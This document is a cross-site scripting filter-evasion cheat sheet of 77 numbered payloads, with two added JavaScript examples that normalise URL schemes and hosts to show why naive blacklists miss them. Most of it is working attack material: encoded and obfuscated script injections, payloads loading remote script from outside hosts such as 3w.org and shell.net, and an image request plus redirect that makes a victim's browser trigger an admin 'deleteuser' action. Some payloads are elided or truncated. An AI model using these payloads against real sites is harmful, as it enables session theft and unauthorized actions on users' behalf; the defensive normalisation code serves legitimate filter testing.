Cross-site image shell
XSS payload: <script>alert("")</script>

Put the payload on the first line of the webshell and save the shell with a .jpg extension. When the "image" is opened, a browser that sniffs content (older IE renders a .jpg that begins with HTML as HTML) runs the script on that first line even though the file is served as an image.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript directive
<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, the scheme is case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#88;&#83;&#83;&#34;&#41;>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode, so no quotes are needed for the string (generate with an encoder/XSS calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) Decimal HTML character references (encoder); the payload is elided in the source
<IMG SRC=jav..omitted..S')>

(9) Decimal HTML character references without trailing semicolons, padded to 7 digits (encoder); payload elided in the source
<IMG SRC=jav..omitted..S')>

(10) Hexadecimal HTML character references, also without semicolons (encoder); payload elided in the source
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab splitting the word javascript
<IMG SRC="jav	ascript:alert('XSS');">

(12) Embedded encoded tab splitting the word javascript
<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Multiline injected JavaScript, an extreme example of XSS. The original spreads the payload over many lines with a carriage return after every character; this copy shows it collapsed onto one line
<IMG SRC="javascript:alert('XSS')">
(16) Getting around character limits (all fragments must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
Concatenated, z becomes document.write("<script src=http://www.shell.net/1.js></script>"), so the last fragment loads the remote script.
(17) Null byte
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null byte 2. In the author's experience null bytes are of little use against domestic sites, because there is seldom anywhere to apply them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" &#14;  javascript:alert('XSS');">
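Added example, not part of the original post: why a filter that looks for the literal string "javascript:" misses the IMG SRC variants in items (3) to (14), (17) and (19), and what a normalising check looks like. It decodes numeric character references (with or without the trailing semicolon, with leading zeros), strips the NUL/tab/newline/control characters older browsers ignored inside the scheme, then compares the lower-cased scheme against a denylist. The sample payloads are copied from those items and item (40); the function names decodeNumericEntities, normaliseScheme, naiveBlacklist, isDangerousUrl and auditPayloads are chosen here, and the constructed vbscript/data entries in the denylist go a little beyond the items above.

```javascript
// Added example, not from the original post. Normalises an attribute value
// the way a lenient browser did before deciding whether its URL scheme runs
// script, and compares that with a naive "javascript:" string match.

// HTML numeric character references; browsers accept them with or without
// the trailing ';' and with leading zeros (items 5, 8-10, 12-14).
function decodeNumericEntities(s) {
  const cp = (n) => (n > 0x10ffff ? '' : String.fromCodePoint(n));
  return s
    .replace(/&#x0*([0-9a-f]{1,6});?/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#0*(\d{1,7});?/g, (_, d) => cp(parseInt(d, 10)));
}

// Extract the scheme after decoding and after dropping NUL, tab, LF, CR and
// the other C0 controls/space that older IE ignored inside "javascript:"
// (items 11-14, 17, 19). Returns the lower-cased scheme, or null when the
// value has no scheme at all (a relative URL).
function normaliseScheme(value) {
  const stripped = decodeNumericEntities(value).replace(/[\x00-\x20]/g, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(stripped);
  return m ? m[1].toLowerCase() : null;
}

// Schemes that execute script when used as an image/frame/link source.
const SCRIPT_SCHEMES = new Set(['javascript', 'vbscript', 'data']);

// The check a typical blacklist filter performs.
function naiveBlacklist(value) {
  return /javascript:/.test(value);
}

// The normalising check.
function isDangerousUrl(value) {
  const scheme = normaliseScheme(value);
  return scheme !== null && SCRIPT_SCHEMES.has(scheme);
}

// Payloads copied from the items above (constructed test input).
const SHEET_PAYLOADS = [
  "javascript:alert('XSS')",                                   // (3)
  "JaVaScRiPt:alert('XSS')",                                   // (4)
  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')", // (5)
  "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058alert('XSS')", // (9)
  "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29", // (10)
  "jav\tascript:alert('XSS');",                                // (11)
  "jav&#x0A;ascript:alert('XSS');",                            // (13)
  "java\u0000script:alert('XSS')",                             // (17)
  " &#14;  javascript:alert('XSS');",                          // (19)
  'vbscript:msgbox("XSS")',                                    // (40)
];

// For each payload, report what the naive and the normalising check say.
function auditPayloads(payloads = SHEET_PAYLOADS) {
  return payloads.map((p) => ({
    payload: p,
    naive: naiveBlacklist(p),
    normalised: isDangerousUrl(p),
  }));
}
```

Only items (3) and (19) contain the literal "javascript:" and are caught by the naive match; the normalising check flags all ten. The right fix remains an allowlist of schemes (http, https, mailto) applied after this normalisation, not a longer denylist.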
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2, protocol-relative URL
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

(32) BODY background image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag event handler
<BODY ONLOAD=alert('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) Stylesheet LINK
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) list-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG with VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META refresh with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) TABLE background
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD background
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with an extra character in front of the scheme (any of 1-32, 34, 39, 160, 8192-8.13, 12288, 65279)
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with the expression split by a comment
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (anything made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with expression (only the tail of the payload survives in this copy)
exppression(alert("XSS"))'>

(53) STYLE tag background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE tag
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash movie that carries the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) Using ActionScript inside the Flash movie to smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d); // the pieces assemble into getURL("javascript:alert('XSS');")

(57) XML namespace. The .htc file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JavaScript is filtered, put the JS code inside an image file and load that file as a script (the source URL is blank in this copy)
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command. The browser sends the request with the victim's cookies, so any action the target site exposes over GET runs in the victim's session
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg hosted on your own server). An Apache Redirect directive, for example in .htaccess, turns the image request into a 302 to the target URL, which the victim's browser then follows with its own cookies
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" '' SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL evasion: IP address instead of hostname
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://%33%77%2E%6F%72%67">XSS</A>

(70) Dword (decimal) IP
<A HREF="http://3232235521">XSS</A>

(71) Hexadecimal IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding: a newline and tabs inside the URL, octal and hex octets
<A HREF="h
tt	p://6&#09;6.000146.0x7.147/">XSS</A>

(74) Dropping [http:] (protocol-relative)
<A HREF="//www.google.com/">XSS</A>

(75) Dropping [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS name (trailing dot)
<A HREF="http://www.google.com./">XSS</A>
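Added example, not part of the original post: the host forms in items (68) to (76) defeat any allowlist that compares the HREF string, because the browser's URL parser turns all of them into the same host. The code below canonicalises the host the way that parser does (numeric character references decoded, tab/LF/CR removed, dword/hex/octal/mixed octets converted to a dotted quad, trailing dot dropped) and checks an allowlist against the result. It goes slightly beyond the items above by also stripping userinfo and a port. The names decodeEntities, parseIPv4Number, ipv4ToDotted, canonicalHost and isAllowedLink are chosen here; the allowlist is constructed.

```javascript
// Added example, not from the original post. Canonicalises the host in an
// <A HREF> value the way a browser's URL parser does, so the dword, hex,
// octal, mixed, protocol-relative and trailing-dot forms in items (68)-(76)
// all collapse to one value that an allowlist can be checked against.

// HTML numeric character references (the &#09; in item 73) are decoded by
// the HTML parser before the URL parser ever runs.
function decodeEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCharCode(parseInt(d, 10)));
}

// Legacy IPv4 number: "0x" prefix is hex, a leading 0 is octal, else decimal.
// Returns NaN for anything that is not a number in that radix.
function parseIPv4Number(part) {
  let radix = 10;
  if (/^0x/i.test(part)) { part = part.slice(2); radix = 16; }
  else if (part.length > 1 && part[0] === '0') { part = part.slice(1); radix = 8; }
  if (part === '') return 0;
  const digits = { 8: /^[0-7]+$/, 10: /^[0-9]+$/, 16: /^[0-9a-f]+$/i }[radix];
  return digits.test(part) ? parseInt(part, radix) : NaN;
}

// Dotted quad for a legacy IPv4 literal (1 to 4 numeric parts, the last part
// filling the remaining bytes), or null when the host is a DNS name.
function ipv4ToDotted(host) {
  const parts = host.split('.');
  if (parts.length > 1 && parts[parts.length - 1] === '') parts.pop(); // "1.2.3.4."
  if (parts.length > 4) return null;
  const nums = parts.map(parseIPv4Number);
  if (nums.some(Number.isNaN)) return null;
  const tailBytes = 5 - nums.length;               // bytes covered by the last part
  for (let i = 0; i < nums.length - 1; i++) if (nums[i] > 255) return null;
  if (nums[nums.length - 1] >= 256 ** tailBytes) return null;
  let value = 0;
  for (let i = 0; i < nums.length - 1; i++) value = value * 256 + nums[i];
  value = value * 256 ** tailBytes + nums[nums.length - 1];
  return [24, 16, 8, 0].map((sh) => (value >>> sh) & 255).join('.');
}

// Canonical host for an http(s) or protocol-relative HREF, or null for any
// other scheme. Tab, LF and CR are removed as the URL parser does, which is
// what makes item (73) resolve at all.
function canonicalHost(href) {
  const s = decodeEntities(href).replace(/[\t\n\r]/g, '').trim();
  const m = /^(?:https?:)?\/\/([^\/?#]*)/i.exec(s);
  if (!m) return null;
  const host = m[1].toLowerCase().replace(/^[^@]*@/, '').replace(/:\d*$/, '');
  return ipv4ToDotted(host) || host.replace(/\.$/, '');
}

// Allowlist check performed on the canonical host, not on the raw string.
function isAllowedLink(href, allowedHosts) {
  const host = canonicalHost(href);
  return host !== null && allowedHosts.includes(host);
}
```

Items (70), (71) and (72) all canonicalise to 192.168.0.1 and item (73) to 66.102.7.147, so a filter that compares raw HREF strings against "192.168.0.1" or "www.google.com" sees four different values where the browser sees one; run the comparison on canonicalHost's output instead.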
(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>